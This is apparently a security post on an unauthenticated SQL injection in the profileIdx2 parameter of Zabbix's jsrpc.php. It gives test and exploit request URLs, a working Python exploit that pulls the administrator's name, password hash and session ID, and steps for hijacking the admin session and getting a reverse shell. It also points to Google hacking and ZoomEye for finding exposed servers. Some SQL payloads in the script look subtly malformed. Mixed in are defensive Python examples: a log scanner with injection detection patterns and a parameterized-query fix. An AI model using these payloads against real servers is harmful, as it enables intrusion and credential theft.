zabbix-20160817-high-risk SQL injection Vulnerability

Source: Internet
Author: User
Tags: sql injection, administrator password

Vulnerability Overview:

Zabbix is an open-source, enterprise-class performance monitoring solution. Recently, the profileIdx2 parameter of Zabbix's jsrpc.php was found to be vulnerable to SQL injection inside an INSERT statement. An attacker does not need valid credentials to reach the vulnerable code and, once inside the Zabbix management system, can gain operating-system-level access to the Zabbix server through features such as scripts. The unauthenticated path has one precondition: the guest account must be enabled. Zabbix ships with an empty password for guest, so installations that keep this default are injectable without any permission.

Degree of impact:

Attack Cost: Low

Hazard Level: High

Login required: No

Affected versions: 2.2.x, 3.0.0-3.0.3 (other versions untested)

Vulnerability testing:

Append the following path to the Zabbix base URL:

jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pagefile=history.php&profileidx=web.item.graph&profileidx2=1+or+updatexml(1,MD5(0x11),1)+or+1=1)%23&updateprofile=true&period=3600&stime=20160817050632&resourcetype=17

If the response contains the MySQL error produced by the injected expression, the vulnerability exists (the original page showed this output as a screenshot, which is not reproduced here).

Version 2.4.6 is also affected.
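As a defender's counterpart to the test request above, the following added Python 3 example (written for this page; it is not part of the original post or of Zabbix) scans web-server access-log lines for jsrpc.php requests whose profileIdx2 value is not a plain integer or carries MySQL error-based injection markers such as updatexml. The log lines are constructed samples modelled on the request shown above; the combined-log format, the marker list and the function names are assumptions of this example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines in Apache/Nginx "combined" format (not real traffic).
# Line 1 is a legitimate screen.get call, lines 2-3 resemble the test request on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Aug/2016:05:06:32 +0000] "GET /zabbix/jsrpc.php?type=9&method=screen.get&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=0&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Aug/2016:05:07:10 +0000] "GET /zabbix/jsrpc.php?type=9&method=screen.get&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,MD5(0x11),1)+or+1=1)%23&updateprofile=true&period=3600&resourcetype=17 HTTP/1.1" 200 1033 "-" "python-urllib2/2.7"
10.0.0.9 - - [17/Aug/2016:05:07:11 +0000] "GET /zabbix/jsrpc.php?type=9&method=screen.get&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&period=3600&resourcetype=17 HTTP/1.1" 200 980 "-" "python-urllib2/2.7"
10.0.0.5 - - [17/Aug/2016:05:08:00 +0000] "GET /zabbix/dashboard.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identity, user, [timestamp], "METHOD target protocol", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INT_RE = re.compile(r"^\d+$")
# Tokens typical of MySQL error-based injection; matched case-insensitively against the decoded value.
SQL_MARKERS = re.compile(
    r"""updatexml|extractvalue|floor\s*\(\s*rand|information_schema|\bunion\b|\bselect\b|['"]|--|#|/\*""",
    re.IGNORECASE,
)


def analyze_request(target):
    """Return the reasons a jsrpc.php request looks like profileIdx2 injection, or [] if benign."""
    parsed = urlparse(target)
    if not parsed.path.lower().endswith("/jsrpc.php"):
        return []
    # Lower-case the keys so profileIdx2 and profileidx2 are treated alike.
    params = {k.lower(): v for k, v in parse_qs(parsed.query, keep_blank_values=True).items()}
    reasons = []
    for value in params.get("profileidx2", []):
        if not INT_RE.match(value):
            reasons.append("profileIdx2 is not a plain integer: %r" % value)
        marker = SQL_MARKERS.search(value)
        if marker:
            reasons.append("profileIdx2 contains SQL marker: %r" % marker.group(0))
    return reasons


def scan_log(text):
    """Parse combined-format log lines and return (ip, timestamp, reasons) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_request(m.group("target"))
        if reasons:
            findings.append((m.group("ip"), m.group("ts"), reasons))
    return findings


if __name__ == "__main__":
    for ip, ts, reasons in scan_log(SAMPLE_LOG):
        print(ip, ts, "; ".join(reasons))
```

The integer check is the decisive one: a legitimate screen.get call always sends a numeric profileIdx2, so any other shape is worth an alert even when no marker keyword is present. The marker list only labels the kind of injection seen.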

Exploit:

An attacker can go further and construct error-based SQL injection statements, without needing to obtain and crack the hashed administrator password.

An experienced attacker can instead read the administrator's SessionID directly from the database, derive the sid from it using the known structure, and substitute it into the cookie to be logged in directly as administrator.

Exploit request:

/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pagefile=history.php&profileidx=web.item.graph&profileidx2=(Updatexml(0X5E,(MD5(0x313233)),0x5e))&updateprofile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5b23297%5d=23297&action=showlatest&filter=&filter_task=&mark_color=1

With the administrator's cookie and password, the attacker can log in to the Zabbix monitoring system as administrator and use the admin script function to make the Zabbix server execute malicious commands (for example, a reverse shell).

Exploit tool:

#!/usr/bin/env python
# -*- coding: gbk -*-
# Date: 2016/8/18
import urllib2
import sys, os
import re


def deteck_sql():
    u'Check if SQL injection is present'
    # A stray single quote in profileIdx2 makes the failing INSERT INTO profiles statement appear in the response
    payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5b23297%5d=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(url + payload, timeout=10).read()
    except Exception, msg:
        print msg
    else:
        key_reg = re.compile(r"Insert\s*into\s*profiles")
        if key_reg.findall(response):
            return True


def sql_inject(sql):
    u'get the content of a specific SQL statement'
    payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(sql) + "&updateprofile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(payload, timeout=10).read()
    except Exception, msg:
        print msg
    else:
        # The selected value is reflected inside MySQL's "Duplicate entry" error text
        result_reg = re.compile(r"duplicate\s*entry\s*'~(.+?) to")
        results = result_reg.findall(response)
        if results:
            return results[0]


if __name__ == '__main__':
    # os.system(['clear', 'cls'][os.name == 'nt'])
    print '+' + '-' * 60 + '+'
    print '\t Python zabbix<3.0.4 SQL injection Exploit'
    print '\t\t time:2016-08-18'
    print '+' + '-' * 60 + '+'
    if len(sys.argv) != 2:
        print 'Usage: ' + os.path.basename(sys.argv[0]) + ' Zabbix website Address'
        print 'Example: ' + os.path.basename(sys.argv[0]) + ' http://www.waitalone.cn/'
        sys.exit()
    url = sys.argv[1]
    if url[-1] != '/':
        url += '/'
    passwd_sql = "(select 1 from (SELECT COUNT(*), concat(SELECT(select Concat(0x7e, select Concat(NAME,0X3A,PASSWD) from Users limit 0,1), 0x7e)) (Information_schema.tables limit 0,1), floor(rand(0)*)) x from Information_schema.tables Group by X) a)"
    session_sql = "(select 1 from (SELECT COUNT(*), concat(SELECT(select Concat(0x7e, select SessionID from Sessions limit 0,1), 0x7e)) (from Information_schema.tables limit 0,1), floor(rand(0)*)) x from Information_schema.tables Group by x)"
    if deteck_sql():
        print u'Zabbix There is a SQL injection vulnerability!\n'
        print u'Administrator user name password:%s' % sql_inject(passwd_sql)
        print u'Administrator session_id:%s' % sql_inject(session_sql)
    else:
        print u'Zabbix There is no SQL injection Vulnerability!\n'
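The tool above works because a request parameter reaches an INSERT statement as text. The following added example, written for this page and not taken from the post or from Zabbix's PHP code, models that pattern in Python 3 with an in-memory SQLite table and shows the hardened form next to it: the parameter is validated as an integer before use and bound as a query parameter instead of being spliced into the statement. The profiles table layout, the parse_idx2 helper and all function names are assumptions of this example.

```python
import re
import sqlite3


def connect():
    """Create an in-memory database with an assumed, simplified profiles table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE profiles (userid INTEGER, idx TEXT, idx2 INTEGER, value_str TEXT)"
    )
    return conn


def build_insert_unsafe(userid, idx, raw_idx2, value):
    """Vulnerable pattern: the raw profileIdx2 string becomes part of the SQL text."""
    return (
        "INSERT INTO profiles (userid, idx, idx2, value_str) VALUES (%d, '%s', %s, '%s')"
        % (userid, idx, raw_idx2, value)
    )


def save_profile_unsafe(conn, userid, idx, raw_idx2, value):
    """Execute the spliced statement and return the idx2 the database actually stored."""
    cur = conn.execute(build_insert_unsafe(userid, idx, raw_idx2, value))
    row = conn.execute("SELECT idx2 FROM profiles WHERE rowid = ?", (cur.lastrowid,)).fetchone()
    return row[0]


def parse_idx2(raw):
    """Accept only a non-negative integer literal; anything else is rejected before SQL is involved."""
    if not re.fullmatch(r"\d{1,10}", raw):
        raise ValueError("profileIdx2 must be a non-negative integer, got %r" % raw)
    return int(raw)


def save_profile_safe(conn, userid, idx, raw_idx2, value):
    """Hardened pattern: validate the type, then bind the value as a query parameter."""
    idx2 = parse_idx2(raw_idx2)
    conn.execute(
        "INSERT INTO profiles (userid, idx, idx2, value_str) VALUES (?, ?, ?, ?)",
        (userid, idx, idx2, value),
    )
    return idx2


if __name__ == "__main__":
    db = connect()
    # A tautology in place of the integer: the unsafe path lets the database evaluate it.
    print("unsafe stored idx2 =", save_profile_unsafe(db, 2, "web.item.graph", "7 or 1=1", "x"))
    print("safe stored idx2 =", save_profile_safe(db, 2, "web.item.graph", "7", "x"))
    try:
        save_profile_safe(db, 2, "web.item.graph", "7 or 1=1", "x")
    except ValueError as exc:
        print("safe path rejected:", exc)
```

The unsafe path does not error on the tautology; SQLite evaluates `7 or 1=1` and stores 1, which is exactly the silent change of meaning that error-based payloads such as the updatexml request on this page build on. The safe path never lets a non-integer reach the statement. Independently of the code fix, the page's precondition for the unauthenticated path is the guest account with its empty default password, so disabling guest closes that path on the configuration side.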

Finding exposed instances:

Google hacking

ZoomEye

Search for monitoring-system login interfaces exposed on the public Internet.
